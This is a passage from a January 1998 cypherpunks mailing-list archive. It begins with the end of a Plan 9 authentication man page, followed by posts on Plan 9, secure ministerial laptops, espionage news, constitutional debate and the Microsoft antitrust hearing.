          Once again we start by passing a ticket request to the AS. Only
          the user ID in the request is meaningful. The AS replies with a
          single ticket (or an error message) encrypted in the user's
          personal key. The user encrypts both the old and new keys with
          the $K sub n$ from the returned ticket and sends that back to
          the AS. The AS checks the reply for validity and replies with
          an AuthOK byte or an error message.
          
        UserProc->AS
                $AuthPass, ~ xxx, ~ xxx, ~ xxx, ~ xxx, ~ UID sub c$
                
        AS->UserProc
                $AuthOK, ~ K sub c lbr AuthTc, ~ xxx, ~ xxx, ~ xxx, ~ K
                sub n rbr$
                
        UserProc->AS
                $K sub u lbr AuthPass, ~ roman "old password", ~ roman
                "new password" rbr$
                
        AS->UserProc
                $AuthOK$
                
   
          
          or
          
        AS->UserProc
                $AuthErr$, 64-byte error string
                
   
          
      Data Base
      
          An ndb(2) database file exists for the authentication server.
          The attribute types used by the AS are hostid and uid. The
          value in the hostid is a client host's ID. The values in the
          uid pairs in the same entry list which users that host ID make
          speak for. A uid value of * means the host ID may speak for all
          users. A uid value of !user means the host ID may not speak for
          user. For example:
          

hostid=bootes

        uid=!sys uid=!adm uid=*

   
          
          is interpreted as bootes may speak for any user except sys and
          adm.
          
    FILES
    
               /lib/ndb/auth
                database file
                
        /lib/ndb/auth.*
                hash files for /lib/ndb/auth
                
    SEE ALSO
    
          fsession(2), auth(2), cons(3), attach(5), auth(8) 
          
   
   Copyright (c) 1995 Lucent Technologies. All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 07:40:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Plan 9 ordering info [rather expensive]
Message-ID: <199801140005.SAA29920@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



If you're interested in getting Plan 9 in CD format:

Harcourt Brace & Co.
800-782-4479

Plan 9 (full distribution on CD w/ source)
ISBN 0-03-017143-1
$367.50 + 8% s/h + state tax (8.25% in Tx)

Usualy takes 24 hours to setup an account with them. Apparently they don't
ship this through retailers.

When I called this morning for up to date info the #3 selection for
individuals and professional didn't work. Just select the operator option
and be done with it. I advised them their VRU didn't work correctly.
If you talk to EJ tell her thanks again.

If you just want to play then go to plan9.att.com and get the disk set
they offer for playing around. It lacks all source but it will install
a minimal system on an Intel box. Should work on most systems though I do
suggest that you use a SCSI based system.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 14 Jan 1998 08:11:03 +0800
To: cypherpunks@cyberpass.net
Subject: British Ministers Adopt Unbreakable Crypto
Message-ID: <199801140005.SAA00748@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



The UK is replacing the traditional "red boxes" used by ministers to
carry their work home with them with high tech laptops.
 
They will use a signet ring and fingerprints to control access to the
computer.
 
There will be a "Duress Finger."  :)
 
-----
 
LONDON (AP) -- It's a briefcase even James Bond could love.
 
Britain's more adventurous Cabinet ministers soon will be spiriting
laptop computers inside their signature ``Red Box'' briefcases,
complete with fingerprint recognition systems and silent alarms.
 
The stacks of papers, briefing documents and constituency
correspondence that now go home with each minister in lead-lined red
briefcases will be replaced in a few months by a specially designed
super-secure laptop -- capable of carrying infinitely more homework.
 
At $4,000 each, the prototypes unveiled Tuesday are seen as a symbol
of the modern Britain so often touted by the Labor Party and are being
billed as a way to make government work more efficiently.
 
They will not, however, be foisted on ministers who prefer the
old-fashioned paper route -- but those holdouts will miss an
electronic voice that chirps ``Good morning, minister'' each time the
computer is turned on.
 
Each computer, built into the briefcase, will come with a security
system that uses a signet ring and fingerprints to control access to
the computer. Ministers who eschew jewelry can have the signet ring's
smart-card incorporated into another device, such as a keychain or
pen.
 
The fingerprint function also requires an alternate finger to be
programmed in case the minister cuts the one designated, thereby
corrupting the fingerprint.
 
``It has certainly been billed as very James Bond-ish and I suppose we
are 'Q,' '' said Alan Rushworth, managing director of Rhea
International, the company that designed the security system, likening
himself to the 007 character who outfits James Bond with all his
gadgets.
 
``There is even a duress finger,'' Rushworth said. ``That is for if a
terrorist or gunman has a gun to the minister's head forcing him to
open the computer. It will appear to function normally but doesn't,
and sends a silent alarm to the Cabinet Office.''
 
No ``top secret'' documents will be loaded on the computers because
such material is seldom transmitted electronically for security
reasons, a government spokeswoman said.
 
Even American security experts could not breach the computer's
security system, Rushworth boasted.
 
``The Cabinet office has used its best government hackers for
extensive penetration testing and they couldn't break it,'' he said.
``It has also been tried by our cousins on the other side of the
Atlantic -- and they couldn't get in either.''

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@beast.brainlink.com>
Date: Wed, 14 Jan 1998 07:25:57 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: news from spyking list...
Message-ID: <Pine.SUN.3.96.980113182242.20522A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: GPS Jamming

*New Scientist* (8 Jan 1998, http://www.newscientist.com) included an
article saying that a Russian company called Aviaconversia was offering a
4-watt GPS/Glonass jammer for less than $4000 at the September Moscow Air
Show. It says that it could stop civilian aircraft locking onto GPS
signals
over a 200 Km radius; military aircraft would be harder to jam, but a more
powerful unit could be built.

The risks (terrorism etc.) are fairly obvious, and it's mentioned that it
would probably be easy to build one even if this company's product is
somehow removed from the market.

**************************************************************************
21)From: SpyKing@thecodex.com
Subject: Spying around the world

Corporate Spying On The Rise In India

Corporate espionage is big business in India, and because of this,
Indian corporations are busy installing internal information security
programs that include paper shredders, computer database
password-protection, and careful security checks of new employees. 

Indian analysts predict that corporate counter-espionage will become
mandatory at many big companies as competition among the major players
heats up, even between regional businesses. 

NSA Monitoring Sales Of Encryption Software

In July, 1995, the National Security Agency (NSA) wrote "A Study of the
International Market for Encryption" which NSA official Jon A.  Goldsmith
declared in sworn testimony should remain secret because "in developing
its portion of the study, NSA sought and received information from the
Department of State, the CIA and from foreign sources."

NSA acquired data for their portion of the report from its global  spying
programs. But in some cases, the information was obtained by the CIA  and
passed onto the NSA. Goldsmith noted one section of the report involved
the "Proposed Netherlands Telecommunications Service Act in 1993."
Goldsmith testified "The first sentence of this paragraph was supplied
by the CIA and is protected." 

The Netherlands is a major encryption hardware and software exporter
(particularly Philips). Apparently the CIA spent some monitoring the
Dutch legislature to find out what kind of laws it intended to pass
regarding encryption technologies. Those details found their way into
the NSA's secret report. 

Another section of this report details the close cooperation between  the
NSA and foreign intelligence services. Goldsmith testified the report
"References discussions between Italian officials and members of the
National Security Authority regarding Law Number 222 of February 27,
1992 and is protected in its entirety..."

The NSA for some time has routinely monitored foreign-produced
encryption technologies and has performed daily reports on these
products, in addition to how fast and how economically it can crack
these products, which so far the NSA has been able to do. But, NSA
officials have testified before Congress, foreign encryption software  is
getting increasingly more sophisticated and thus harder and more costly
to break in a timely manner. 

Domestically, the NSA appears to be secretly keeping tabs on U.S. sales
of encryption software. In the secret 1995 report there's a section
titled, "Software Outlets/Computer Stores" which "Refers to a internal
NSA document control number and project name..."

Observers believe this project involves domestic surveillance of US
retail sales of encryption software. What, how, and who is being
monitored, though, is a secret. 

FBI Finds Files On Chinese Influence, Counterintelligence Sources
Worried 

The FBI recently discovered new and heretofore unknown
counterintelligence files in its investigation of a possible Chinese
plot to influence U.S. elections. The material was found following a
search FBI Director Louis Freeh ordered in September "when it became
apparent the FBI was in possession of certain counterintelligence
information" an FBI statement said. 

Sources at other agencies say they are appalled that the FBI could
misplace or overlook such vital information in a major
counterintelligence probe. Particularly when the probe is of a
government like that of China, which is well known for spying on  America
and is notorious for stealing details on advanced American technologies. 

"Either the Bureau is inept, or something else happened here," said one
counterintelligence source, who was alluding to the files possibly  being
been alleged in relation to White House campaign fund-raising
activities). 

China Grooming More Spies?

About 100 elite Hong Kong schools, headed by the territory's Catholic
institutions, are allowed to teach all classes in English, despite the
territory's return to Chinese rule. Starting with the new school term,  a
total of 307 of the territory's 400 schools must teach all subjects in
Chinese. However, believing that their children will have better job
opportunities, most parents still want English instruction for them. By
the year 2000, all students will study Mandarin Chinese, the basis for
nation-wide university entrance exams. 

Western intelligence experts believe the elite school language leniency
stems from the mainland government's desire to continue the English
language program to groom economic and political spies. The US State
Department has identified China as the country which sends the largest
number of spies to the United States and has uncovered a Chinese spy
within its own ranks during 1997. 

Iraq's Intelligence Service Spies On UN WMD Observers

Utilizing sophisticated electronic eavesdropping and other SIGINT
resources, Iraqi intelligence agents have been spying on UN weapons
inspectors (whose ranks reportedly include individuals collecting
particular intelligence for the U.S.) and have been able to learn in
advance of the UN inspection team's targets. 

Consequently, Iraq has been able to quickly secrete both their weapons
of mass destruction and their records of manufacturing, U.S. military
and intelligence officials have said. These officials suspect that some
of the SIGINT capabilities of Iraq have been provided through black
market channels from the Former Soviet Republics (FSR). 

U.S. Defense Secretary William Cohen has publicly acknowledged that the
U.S. believes the Iraqis have the ability to eavesdrop electronically  on
the UN inspectors. In addition, Iraqi agents are suspected of  conducting
physical and electronic surveillance of individual UN inspection team
members, including monitoring their homes. 

Ewen Buchanan, the spokesman for the inspection commission at UN
headquarters in New York, is quoted saying "we are obviously aware that
the Iraqis try their damnedest to monitor us, our planning, our
thoughts, even in New York, and to develop an early warning system --
what we want, where we're going, what we are trying to inspect. They
must use every means at their disposal."

Pentagon spokesman Kenneth Bacon said intelligence authorities do not
believe that Saddam Hussein has managed to penetrate the UN Special
Commission of weapons inspectors, known as UNSCOM, but rather they believe
that "Iraq has found ways to learn 
ahead of time some of UNSCOM's plans," using SIGINT and other technical
means. 

Counterintelligence Searches For North Korean Spies

The Agency for National Security Planning (NSP) believes North Korea  has
targeted 1,500 South Koreans to establish new spy networks within South
Korea. Evidence of this effort has been obtained through the
investigations and arrests of alleged spies. 

That North Korea is bankrolling a massive spy operation against the
South bolsters intelligence findings by U.S. counterintelligence
sources, who say North Korea is aggressively recruiting spies in South
Korea, targeting infrastructure, commerce, and technology in particular. 

Details on the North Korean spying activities began to emerge following
the recent arrest of 69-year-old Ko Young-bok, a noted sociology
professor who once worked for Seoul National University. Ko stands
accused of spying for North Korea for 36 years. He was arrested after
having been linked to a North Korean 
spy couple. 

During its investigation, the NSP intercepted a telephone communication
Ko had received from an unidentified source immediately before his
Ko had received from an unidentified source immediately before his
arrest urging him to fly to Beijing and take shelter at the North  Korean
embassy there. 

The caller is believed by the NSP to be in charge of North Korean spy
rings in South Korea. According to intelligence sources, few people,
except for ranking North Korean spy officials, know who all the spies
are in South Korea. Intelligence officials said all North Korean spies
form small separate rings and contact between the different rings is
limited. 

Earlier, Shim Jong-ung, 55, was arrested on charges of spying for North
Korea. A Seoul subway official, Shim is accused of providing North  Korea
with information which could be used to destroy subway systems.  

Bok is an eminent scholar known as the father of sociology studies in
South Korea, who served as director of a government research center and
who made two official trips to North Korea in 1973 as a South Korean
adviser. South Korean authorities assert that on those occasions he
actually briefed North Korea on the South's bargaining position. 

The alleged spy ring was broken up when a leftist reported to South
Korean authorities that he had been approached by two North Koreans and
asked to spy for the North. That led counterintelligence officials to
detain the two North Koreans, Choi Chung Nam, 35, and his wife, Kang  Yun
Jung, 28. 

Kang committed suicide a day later. The police had searched the two
carefully for any suicide capsules, X-raying them and examining their
mouths, but when Kang went to the bathroom with an escort she removed a
cyanide capsule she had hidden in her vagina and killed herself with it. 

Choi, however, confessed and apparently led the counterintelligence
agents to the North Korean spies with whom he had been in contact. He
also showed them drop-off places around Seoul used to hide guns, radio
transmitters and ball-point pens that shoot lethal poison

Choi allegedly confessed that their mission was to recruit agents,
future infiltrations, and obtain information about a new, highly
productive strain of corn developed in the South. 

Have Pakistan Intelligence Agents Penetrated U.S. Agencies?

According to fundamental Pakistani sources monitored by U.S.
intelligence analysts, "trusted" "brothers" have managed to rise to
crucial positions in U.S. military intelligence, and have access to
details about CIA operations in the 
Middle East. 

English NSA Facility Comes Under Fire

An NSA facility in Menwith Hill, England, the biggest spy station in  the
world capable of monitoring the communications spectrum throughout
Europe, has come under British scrutiny. The European Commission has
issued a report, "Assessing the Technologies of Political Control,"  that
says the spying system, known as "Echelon," is a threat to European
privacy rights and laws. 

European Commission spokesman, Simon Davies, said the report warns that
the system can "eavesdrop on every telephone, email, and telex
communication around the world."

According to the report, "the Echelon system forms part of the UKUSA
system but unlike many of the electronic spy systems developed during
the Cold War, Echelon is designed primarily for non- military targets:
governments, organizations and businesses in virtually every country. 

"The Echelon system works by indiscriminately intercepting very large
quantities of communications and then siphoning out what is valuable
using artificial intelligence aids like MEMEX to find key words."
Echelon uses a number of national dictionaries containing key words of
interest to each country. 

The Commission report was requested last year by the Civil Liberties
Committee of the European Parliament. It contains details of a network
of American-controlled spy stations on British soil and around the  world
that "routinely and indiscriminately" monitor "countless phone, fax and
email messages."

It states "within Europe all email telephone and fax communications are
routinely intercepted by the United States National Security Agency
transferring all target information from the European mainland via the
strategic hub of London then by satellite to Fort Meade in Maryland via
the crucial hub at Menwith Hill" in Yorkshire. 

The report recommends a variety of measures for dealing with the NSA
facility at Menwith Hill and other centers including that "the European
Parliament should reject proposals from the United States for making
private messages via the global communications network Internet)
accessible to US intelligence agencies. 

The report also urges a fundamental review of the involvement of the
American NSA in Europe, suggesting that the activities be scaled down,
or become more open and accountable. 

The report was the subject of discussion on Dec. 21 by the committee of
the office of Science and Technology Assessment in Luxembourg. They
confirmed that the citizens of Britain and other European states are
subject to an intensity of surveillance far in excess of that imagined
by most parliaments. 

The report was developed due to pressure by Glyn Ford. Labour MEP for
Greater Manchester East, England. He says "there are times in history
when technology helps democratize, and times when it helps centralize.
This is a time of centralization. The justice and home affairs pillar  of
Europe has become more powerful without corresponding strengthening of
civil liberties."

The reaction of the members was one of shock and "deep concern" for the
rights of European citizens even though the UK facility has been in
place for over 15 years and the technology there has been an "open
secret" for most of that period. Thus, the question becomes have the
European governments dismissed information from their own intelligence
personnel as impossible, or does this signal a new coldness in
European/US relations. 

According to the London Telegraph, the real concern is not so much  civil
liberties as industrial espionage. In a Dec. 16 report it stated that
"the principal motivation for this rush of development is the US
interest in commercial espionage." The report pointed out that several
of the facilities have been in place since the Nineteen-Fifties. The
role of these NSA sites was to provide military, diplomatic and  economic
intelligence by intercepting communications from throughout the  Northern
Hemisphere. 

When the British Parliament has questioned new eavesdropping
developments over the past 40 years, secrecy issues have generally been
invoked. With treaties and agreements with other European countries,
these concerns are not likely to block future investigations by the
European Parliament and other E. U. groups. France and Germany are
particularly expected to pursue the issues raised based on concerns
about industrials spying. Last year, several American agents were
expelled from France on charges of economic espionage. 

Whether the impetus for the European report was concern for civil  rights
or over trade secrets, the results may be that we in the US will be
better informed of what the NSA is doing at home and how our own rights
have been treated by an organization which has the motto: "We don't
talk, we listen."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 08:08:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Don't shoot the messenger (Re: 1 Question to Dr. Froomkin...) (fwd)
Message-ID: <199801140034.SAA30080@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 13 Jan 1998 18:38:43 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Don't shoot the messenger (Re: 1 Question to Dr. Froomkin...)

> It appears to me that your comments to Michael are based on your views
> on the undesirability of the way the US judicial system operates in
> practice today.  Michael is merely offering his expert opinion on how
> various questions would likely be interpreted by the current legal
> system.

Ok. It's not just the US judicial system, include the executive and
legislative branches as well.

> Screams of "and you think this is a good idea?" and "but what about
> the constitution" are misdirected; I strongly suspect each of the
> three posters I mention above share your distaste for the redefinition
> of meanings and blatant disregard for the fairly clear meanings of the
> constitution.

You propose speaking softly will resolve the issue? If so why speak at all
since that is the softest speech of all. Your position seems to be that if
a question is hard then it should be avoided because it might offend
the sensibilities? You propose that justice would be better served if
it were all masked in innuendo and euphamism?

Perhaps, that is no reason not to take them to task when they expound a
position using fallacious arguments. Further, Dr. Froomkin is a law
professor who *trains* future lawyers. If anyone should be held to task for
their actions and views it is those who are deciding what tomorrows world
will look like and the people charged with those decisions. There is a
fundamental ethical responsibility for conservatism and literalism in those
enterprises that simply isn't present in most other 'jobs'. We aren't
playing horseshoes or handgrenades - close enough is not good enough.

There is a fundamental difference between Lawyers, Doctors, & Soldiers and
the vast majority of other human endeavours. In short, they are given the
lattitude to decide events that directly and immediatley impact human life.
Engineers, Pilots, hamburger flippers, etc. are seldom in a position as a
matter of course of their practicing their vocation to decide whether a
person will live or die. Because of this exclusion from commen behavioral
limitations they should receive *less* latitude and trust in their actions
instead of more (which is what is happening today). Ulitmately, when a lawyer
fails in their duty to use *every* legal recourse a person sits in a room and
gets to listen to the hiss of cyanide drop into the acid. When these people
make a mistake there is no 'fixing' it. Sometimes "I'm sorry" just doesn't
cut it. It is entirely too important to be complacent or trust without
verification (thanks to Pres. Reagan for that one). The road to hell is
paved with good intentions.

We'll just have to agree to disagree here. If they take the job they take
the responsibility to answer for their actions to any and every citizen that
asks for it. However inconvenient, uncomfortable, or rude the question may
be posed because the *next* citizen they ask to trust them may be the one
asking the question. Never forget that but by the grace of God there go
you.

If you want to trust your future to somebody who 'shuts down' because
somebody says "spin doctor bullshit" or strenously defends their views be
my guest. Me, I want a MUCH more mature and determined individual handling
me and my decendants future. I want to experience that strength of
conviction from them not a yellow streak.




    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:29:06 +0800
To: cypherpunks@ssz.com
Subject: Don't shoot the messenger (Re: 1 Question to Dr. Froomkin...)
In-Reply-To: <199801131845.MAA28160@einstein.ssz.com>
Message-ID: <199801131838.SAA00317@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

It appears to me that your comments to Michael are based on your views
on the undesirability of the way the US judicial system operates in
practice today.  Michael is merely offering his expert opinion on how
various questions would likely be interpreted by the current legal
system.

Black Unicorn also tends to get flack from various people for stating
what I am sure is a realistic view of the way that certain legal
questions would be viewed by judges, the supreme courts etc.

Personally I am grateful to any one with legal expertise giving input
to legal questions on list.  Greg Broiles also adds useful comments in
this area.

Screams of "and you think this is a good idea?" and "but what about
the constitution" are misdirected; I strongly suspect each of the
three posters I mention above share your distaste for the redefinition
of meanings and blatant disregard for the fairly clear meanings of the
constitution.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Wed, 14 Jan 1998 10:11:10 +0800
To: The Sheriff <cypherpunks@toad.com
Subject: Freedom Forum report (freedom of association)
In-Reply-To: <19971226.145900.12766.0.Lord_Buttmonkey@juno.com>
Message-ID: <34BC1B0C.FB57F941@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



The Sheriff wrote:
> 
> At 8:26 PM -0800 1/10/98, Bill Stewart wrote:
> >>>> Umm, no, freedom doesn't work like that.  If you open a *private*
> >>>> establishment, you have the right, according to the constitution, to
> >>>> deny *anyone* the right to enter or eat in your restraunt.
> >
> >I don't see freedom of association listed anywhere there;
> >you might construe it as a "taking" or something, but it'd be a stretch.
> >Also, there was a really appalling court case in the 1890s
> >(Plessey vs. Ferguson), in which the Supremes ruled that states
> >could require segregation with separate but equal accommodations;
> >it was somewhat overturned by Brown vs. Board of Education in 1954,
> >but the idea that the government can tell you how to run your business
> >is long established (after all, we'd need much smaller governments
> >if they couldn't be interfering in business.)
> 
> Firstly, something being long-established doesn't make it right.
> SO, let's look at it this way, regarding the freedom of association.

These arguments are all smoke and mirrors unless we figure out
where
authority lies (? ;-)

As far as I'm concerned freedom of association is implied by
freedom
of assembly.  To assemble in this context obviously means to
associate.
If it doesn't, then what the hell is it?  To come together in
order to
work things out?  Is that association?  In the context of
assembling
for commerce, commerce is just assembling and agreeing on the
terms
of free association.

The authority of a Supreme Court was challenged by Thomas
Jefferson, who
speculated that if such a court were the ultimate arbiter of
justice, then
a tyranny of the judiciary would follow.

So who ultimately judges?  I should think having a federal body 
judge the constitutional limitations of the federal government
is an
obvious conflict of interest.  In any case, anyone willing to
read
the constitution and do just a little bit of homework will find
out
that the constitution is a *limitation* of the powers of the
federal
government, not a broad grant.  This design of the Constitution
was
seriously undermined when Roosevelt stacked the Supreme Court in
order
to judge that Social (in)Security was constitutional.  In their
decision
they decided that the welfare clause was a broad grant of power
to
federal government.  This flies in the face of more than 100
years
of judicial readings of the constitution, not to mention logic.
If the federal government was given a broad grant of powers in
the Constitution, why did it outline only specific powers?
(In fact, exactly this argument was put forth when Madison(?)
was questioned on the intent of the welfare clause  -- didn't
the
Supreme Court justices, with their intellectual clout bother to
research the writing of the designers of said document?)

[little know fact: Earl Warren, noted Supreme Court "Justice"
was
the designer of the Japanese-American Prison camps in the US
during
WWII]

If the US Constitution is a contract with the people on the
scope and
nature of their government, then I at least want an outside
arbiter
of that contract.  All references to Spooner's "The Constitution
of No
Authority" aside, if it is not a contract then were living on
the other
side of the looking glass, Alice. 

Before someone starts spouting off on "our living
constitution"(TM) someone
please tell me why they didn't strike out the conflicting parts
of
the constitution when they "grew" it?  Something like
"amendments
number one, two, five, nine and ten should be amended to read
"unless we say otherwise".  Alterations of public law almost
always specify the
previous laws that are struck down.  In fact, if memory serves,
the repeal of prohibition specifically alters the amendment that
created it.

(It is left as an excercise to the reader to figure out why
prohibition
needed an amendment to the constitution while prohibition of
other
mind altering substances did not ;-)

Have a day.

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 14 Jan 1998 08:08:33 +0800
To: cypherpunks@cyberpass.net
Subject: Microsoft Exploratorium, from The Netly News
Message-ID: <v03007809b0e1b158297b@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain




**********

http://cgi.pathfinder.com/netly/opinion/0,1042,1685,00.html

The Netly News (http://netlynews.com/)
January 13, 1998

Which Way the Windows
by Declan McCullagh (declan@well.com)

        Looks like it's upgrade time not just for Microsoft Windows, but
   also for Microsoft's legal strategy. As engineers frantically debugged
   the Windows 98 beta last week, senior Microsoft executives roamed
   Washington, D.C., apologizing for their previous arrogance and saying
   they had been misunderstood. Call it Microsoft PR 2.0. "What we have
   not done is communicate" the way the software works, Robert Herbold,
   Microsoft chief operating officer, told The Netly News last Friday.

        But will Microsoft's new humility appease federal judge Thomas
   Penfield Jackson, who already issued a preliminary injunction against
   the Redmond firm? He's scheduled to hear from the company's lawyers
   and the Department of Justice this morning. Both have spent a good
   chunk of the last month complaining about each other: The government
   says Microsoft violated the judge's order, and Microsoft says the
   government is "poorly informed."

        As his attorneys argue the law, Bill Gates will be practicing
   politics -- a skill that will come in handy if Congress holds more
   antitrust hearings when it returns in late January. Pundits have made
   much of Gates's Democratic sympathies, another image he's trying to
   discard (or at least upgrade). Today Gates is scheduled to sit down
   for a private chat with technophilic House Speaker Newt Gingrich
   (R-Georgia), who will also tour the Microsoft campus.

[...]


***********

http://cgi.pathfinder.com/netly/afternoon/0,1012,1686,00.html

The Netly News / Afternoon Line
January 13, 1998
Microsoft Exploratorium

   The ugly guts of Microsoft Windows were on display today during a
   six-hour federal district court hearing in Washington, DC. Attorneys
   from Microsoft repeatedly pointed at a list of hundreds of .DLL and
   .EXE files and challenged the government to answer one deceptively
   simple query: Which files are part of Internet Explorer?

   The outcome of the case may well turn on the answer to that question,
   which lies at the heart of the Justice Department's beef with the
   software giant. Last month Judge Thomas Penfield Jackson ordered
   Microsoft to stop using its operating system's popularity to
   force-feed Internet Explorer to computer makers.

   But, again, which files belong to Internet Explorer? The government's
   witness ducked the question. "I can't go through your list and
   say which files are unique to Internet Explorer," replied
   author and computer consultant Glenn Weadock. "I don't think it's
   possible or even especially useful to define a list of files and say
   this is part of, or this is not a part of Internet Explorer."

   Which Microsoft has argued all along -- their browser is integrated
   into the operating system. Yanking it out, the company says, would be
   like amputating a leg: a person could only hobble along, at best. The
   government views this as a weak excuse, at best. "The court issued a
   very simple, broad order and Microsoft through its actions defied
   rather than complied with that order," said Justice Department trial
   attorney Phillip Malone. The government is asking Judge Jackson to
   hold Microsoft in contempt and levey a million-dollar-a-day fine.

   The hearing will continue tomorrow when Microsoft vice president David
   Cole testifies. - By Declan McCullagh/Washington


--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 09:01:52 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: plan 9 features (Re: autonomous agents (fwd)) (fwd)
Message-ID: <199801140127.TAA30446@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 00:33:14 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: plan 9 features (Re: autonomous agents (fwd))

> Sounds interesting.  I am not familiar with plan 9 besides the
> enthusings of a colleague reminiscing about the work done at York
> Univ, UK with plan 9.
> 
> Java has a lot going for it as a candidate due to portability and code
> distribution support.  I think the only thing missing from java is the
> bidding and scheduling mechanisms.  Your other forwarded message on
> plan 9 looks interesting also.

I have been working on a potential distributed data haven model using the
Plan 9 architecture. I have finaly amassed enough machines where I can
actualy dedicate the i/o, process, and file servers on seperate machines.
The problem that I see for the immediate future is getting nodes that don't
happen to reside on my premises for additional testing in about a year. I
don't have a clue to how to get people to spend $400 bucks for the software
(which the ATT license prohibits from commercial use) *and* dedicate several
machines to the enterprise. But I'm not going to give up, maybe some folks
will volunteer just to do it...:)

I took the liberty of forwarding the man page for the auth() function to the
cpunks list. It describes the 56-bit DES based authentication mechanism. I
personaly don't care for DES so at some point I will be looking to replace
that mechanism with an alternative.

I also need to take some time and look at porting the Plan 9 file server
adapter for Unix to Win95/NT. Either that or I mount the file systems to a 
suitably enhanced Linux box and then export from there. This would imply
that the Win95/NT boxes need to be on the physical network of the Linux box
or else excessive opportunities for MITM attacks are present. Not that
simply being on the same network provides complete protection either. I hope
that OpenNT will provide enough Unix-like features to minimize the port
effort.

The Plan 9 mechanism also needs to be enhanced in such a way that besides
the access token involving encryption the actual transfer of packets are
also content encrypted. This has potential compatibility problems with
un-enhanced Plan 9 servers that I haven't had a chance to look at.

Once I have a system up and running it will allow non-Plan 9 systems to
access the resources by using what is called 'hand-held DES encryptors'.
Unfortunately, there is not a real description of how this is to be
accomplished in a real-world manner.

My hope is to have something available sometime this summer that will allow
folks to play with it at least in a limited way.

If you get the chance and have the resources you should look into at least
getting the Plan 9 documents. They're like $150 but call and verify that
price since I didn't this morning. Also note, there are now two releases
of Plan 9 floating around out there. The only distinction I am aware of is
one is the 'old' release and the current is the 'new' release. Don't have a
clue as to how to tell them apart or what compatibility problems will exist.

My best estimate is that in about a month I will have the resources to
install and begin developing the model. I am currently between employers (I
don't work at Tivoli-IBM anymore) so I'm job hunting in the Austin area
over the next few weeks. I'll make reports to the list on the results as I
manage to get results.

I don't know about Java on Plan 9, I'll look into it.

Take care.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 10:21:25 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Freedom Forum report (freedom of association) (fwd)
Message-ID: <199801140246.UAA31006@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
